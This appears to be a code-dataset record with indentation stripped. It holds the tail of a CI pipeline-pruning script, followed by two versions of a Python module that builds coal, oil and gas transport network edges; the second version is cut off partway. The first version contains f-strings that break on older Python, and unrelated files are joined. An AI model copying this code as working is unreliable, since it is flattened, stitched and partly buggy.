raise ValueError(f"unexpected non-str non-list for depends_on: {d}")
if "plugins" in config:
for plugin in config["plugins"]:
for plugin_name, plugin_config in plugin.items():
if plugin_name == "./ci/plugins/mzcompose":
name = plugin_config["composition"]
composition = mzcompose.Composition(repo, name)
for dep in composition.dependencies:
step.image_dependencies.add(dep)
step.extra_inputs.add(str(repo.compositions[name]))
steps[step.id] = step
# Find all the steps whose inputs have changed with respect to main.
# We delegate this hard work to Git.
changed = set()
for step in steps.values():
inputs = step.inputs()
if not inputs:
# No inputs means there is no way this step can be considered
# changed, but `git diff` with no pathspecs means "diff everything",
# not "diff nothing", so explicitly skip.
continue
if have_paths_changed(inputs):
changed.add(step.id)
# Then collect all changed steps, and all the steps that those changed steps
# depend on.
needed = set()
def visit(step: PipelineStep) -> None:
if step.id not in needed:
needed.add(step.id)
for d in step.step_dependencies:
visit(steps[d])
for step_id in changed:
visit(steps[step_id])
# Print decisions, for debugging.
for step in steps.values():
print(f'{"✓" if step.id in needed else "✗"} {step.id}')
if step.step_dependencies:
print(" wait:", " ".join(step.step_dependencies))
if step.extra_inputs:
print(" globs:", " ".join(step.extra_inputs))
if step.image_dependencies:
print(
" images:", " ".join(image.name for image in step.image_dependencies)
)
# Restrict the pipeline to the needed steps.
pipeline["steps"] = [
step for step in pipeline["steps"] if "wait" in step or step["id"] in needed
]
def have_paths_changed(globs: Iterable[str]) -> bool:
"""Reports whether the specified globs have diverged from origin/main."""
diff = subprocess.run(
["git", "diff", "--no-patch", "--quiet", "origin/main...", "--", *globs]
)
if diff.returncode == 0:
return False
elif diff.returncode == 1:
return True
else:
diff.check_returncode()
raise RuntimeError("unreachable")
if __name__ == "__main__":
sys.exit(main())
|
import logging, json, os, sys
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
import pandas as pd
from tqdm import tqdm
tqdm.pandas()
from ffsc.flow.recipes import recipes
def get_edges(df,dup_1, dup_2, reverse):
edges = ['START','END']
if dup_1:
edges[0] = 'START_B'
if dup_2:
edges[1] = 'END_B'
if reverse:
edges = [edges[1], edges[0]]
return df[edges+['IMPEDANCE']].to_records(index=False).tolist()
def make_coal_network(
df_cities,
df_powerstations,
df_coalmines,
df_edges_cities,
df_edges_powerstations,
df_edges_coalmines,
df_edges_other_railways,
df_edges_railways_other,
df_edges_shippingroutes_other,
df_edges_railways_railways,
df_edges_shippingroutes_shippingroutes, flow_parameters):
logger = logging.getLogger(f'flow_edges_coal')
for df in [df_cities,
df_powerstations,
df_coalmines,
df_edges_cities,
df_edges_powerstations,
df_edges_coalmines,
df_edges_other_railways,
df_edges_railways_other,
df_edges_shippingroutes_other,
df_edges_railways_railways,
df_edges_shippingroutes_shippingroutes]:
print (df.head(5))
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_coalmines,
df_edges_other_railways,
df_edges_railways_other,
df_edges_shippingroutes_other,
df_edges_railways_railways,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_coalmines',
'df_edges_other_railways',
'df_edges_railways_other',
'df_edges_shippingroutes_other',
'df_edges_other_shippingroutes',
'df_edges_railways_railways',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df['START'].str.split('_').str[0].unique()}, {df['END'].str.split('_').str[0].unique()}')
## trim for coal
logger.info('Trimming for coal')
powerstations_noncoal = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Coal'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_noncoal)]
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
df_edges_railways_other = df_edges_railways_other[~df_edges_railways_other['END'].isin(powerstations_noncoal)]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~df_edges_shippingroutes_other['END'].str.split('_').str[0].isin(['LNGTERMINAL','SHIPPINGROUTE'])]
### get ingredients
df_ingredients = {
'coalmines-railways':df_edges_other_railways.copy(),
'coalmines-firstmile':df_edges_coalmines.copy(),
'railways-railways':df_edges_railways_railways.copy(),
'railways-ports':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'railways-powerstations':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'railways-cities':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='CITY'].copy(),
'lastmile-powerstations': df_edges_powerstations.copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['coalmines-railways']['IMPEDANCE']= (df_ingredients['coalmines-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['coalmines-firstmile']['IMPEDANCE']=(df_ingredients['coalmines-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['railways-railways']['IMPEDANCE']=(df_ingredients['railways-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'])*flow_parameters['tperTJ']['coal']
df_ingredients['railways-ports']['IMPEDANCE']=(df_ingredients['railways-ports']['DISTANCE']/1000*flow_parameters['RAILCOST']+ flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['shipping-ports']['IMPEDANCE']=(df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['shipping-shipping']['IMPEDANCE']=(df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['coal']
df_ingredients['railways-powerstations']['IMPEDANCE']=(df_ingredients['railways-powerstations']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['railways-cities']['IMPEDANCE']=(df_ingredients['railways-cities']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['lastmile-powerstations']['IMPEDANCE']=(df_ingredients['lastmile-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['cities-lastmile']['IMPEDANCE']=(df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['coal']
for step in recipes['coal']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['coal']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_oil_network(
df_cities,
df_powerstations,
df_oilfields,
df_oilwells,
df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes,
flow_parameters):
logger = logging.getLogger(f'flow_edges_oil')
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_oilfields',
'df_edges_oilwells',
'df_edges_other_pipelines',
'df_edges_pipelines_other',
'df_edges_pipelines_pipelines',
'df_edges_shippingroutes_other',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df['START'].str.split('_').str[0].unique()}, {df['END'].str.split('_').str[0].unique()}')
## trim for oil
logger.info('Trimming for oil')
print ('step 1')
print (df_edges_powerstations)
powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Oil'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
print ('step 2')
print (df_edges_powerstations)
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
print ('step 3')
print (df_edges_powerstations)
df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
#print (df_edges_pipelines_other)
#print (df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')
df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
### get ingredients
df_ingredients = {
'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
'pipelines-ports':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT'].copy(),
'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-ports']['IMPEDANCE'] = (df_ingredients['pipelines-ports']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-ports']['IMPEDANCE'] = (df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
for step in recipes['oil']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['oil']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_gas_network(
df_cities,
df_powerstations,
df_oilfields,
df_oilwells,
df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes,
flow_parameters):
logger = logging.getLogger(f'flow_edges_Gas')
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_oilfields',
'df_edges_oilwells',
'df_edges_other_pipelines',
'df_edges_pipelines_other',
'df_edges_pipelines_pipelines',
'df_edges_shippingroutes_other',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df['START'].str.split('_').str[0].unique()}, {df['END'].str.split('_').str[0].unique()}')
## trim for oil
logger.info('Trimming for gas')
powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Gas'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT')]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT')]
### get ingredients
df_ingredients = {
'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
'pipelines-lng':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
'shipping-lng':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-lng']['IMPEDANCE'] = (df_ingredients['pipelines-lng']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-lng']['IMPEDANCE'] = (df_ingredients['shipping-lng']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
for step in recipes['gas']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['gas']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE']) | import logging, json, os, sys
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
import pandas as pd
from tqdm import tqdm
tqdm.pandas()
from ffsc.flow.recipes import recipes
def get_edges(df,dup_1, dup_2, reverse):
edges = ['START','END']
if dup_1:
edges[0] = 'START_B'
if dup_2:
edges[1] = 'END_B'
if reverse:
edges = [edges[1], edges[0]]
return df[edges+['IMPEDANCE']].to_records(index=False).tolist()
def make_coal_network(
df_cities,
df_powerstations,
df_coalmines,
df_edges_cities,
df_edges_powerstations,
df_edges_coalmines,
df_edges_other_railways,
df_edges_railways_other,
df_edges_shippingroutes_other,
df_edges_railways_railways,
df_edges_shippingroutes_shippingroutes, flow_parameters):
logger = logging.getLogger(f'flow_edges_coal')
for df in [df_cities,
df_powerstations,
df_coalmines,
df_edges_cities,
df_edges_powerstations,
df_edges_coalmines,
df_edges_other_railways,
df_edges_railways_other,
df_edges_shippingroutes_other,
df_edges_railways_railways,
df_edges_shippingroutes_shippingroutes]:
print (df.head(5))
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_coalmines,
df_edges_other_railways,
df_edges_railways_other,
df_edges_shippingroutes_other,
df_edges_railways_railways,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_coalmines',
'df_edges_other_railways',
'df_edges_railways_other',
'df_edges_shippingroutes_other',
'df_edges_other_shippingroutes',
'df_edges_railways_railways',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
## trim for coal
logger.info('Trimming for coal')
powerstations_noncoal = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Coal'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_noncoal)]
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
df_edges_railways_other = df_edges_railways_other[~df_edges_railways_other['END'].isin(powerstations_noncoal)]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~df_edges_shippingroutes_other['END'].str.split('_').str[0].isin(['LNGTERMINAL','SHIPPINGROUTE'])]
### get ingredients
df_ingredients = {
'coalmines-railways':df_edges_other_railways.copy(),
'coalmines-firstmile':df_edges_coalmines.copy(),
'railways-railways':df_edges_railways_railways.copy(),
'railways-ports':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'railways-powerstations':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'railways-cities':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='CITY'].copy(),
'lastmile-powerstations': df_edges_powerstations.copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['coalmines-railways']['IMPEDANCE']= (df_ingredients['coalmines-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['coalmines-firstmile']['IMPEDANCE']=(df_ingredients['coalmines-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['railways-railways']['IMPEDANCE']=(df_ingredients['railways-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'])*flow_parameters['tperTJ']['coal']
df_ingredients['railways-ports']['IMPEDANCE']=(df_ingredients['railways-ports']['DISTANCE']/1000*flow_parameters['RAILCOST']+ flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['shipping-ports']['IMPEDANCE']=(df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['shipping-shipping']['IMPEDANCE']=(df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['coal']
df_ingredients['railways-powerstations']['IMPEDANCE']=(df_ingredients['railways-powerstations']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['railways-cities']['IMPEDANCE']=(df_ingredients['railways-cities']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['lastmile-powerstations']['IMPEDANCE']=(df_ingredients['lastmile-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
df_ingredients['cities-lastmile']['IMPEDANCE']=(df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['coal']
for step in recipes['coal']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['coal']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_oil_network(
df_cities,
df_powerstations,
df_oilfields,
df_oilwells,
df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes,
flow_parameters):
logger = logging.getLogger(f'flow_edges_oil')
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_oilfields',
'df_edges_oilwells',
'df_edges_other_pipelines',
'df_edges_pipelines_other',
'df_edges_pipelines_pipelines',
'df_edges_shippingroutes_other',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
## trim for oil
logger.info('Trimming for oil')
print ('step 1')
print (df_edges_powerstations)
powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Oil'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
print ('step 2')
print (df_edges_powerstations)
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
print ('step 3')
print (df_edges_powerstations)
df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
#print (df_edges_pipelines_other)
#print (df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')
df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
### get ingredients
df_ingredients = {
'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
'pipelines-ports':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT'].copy(),
'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
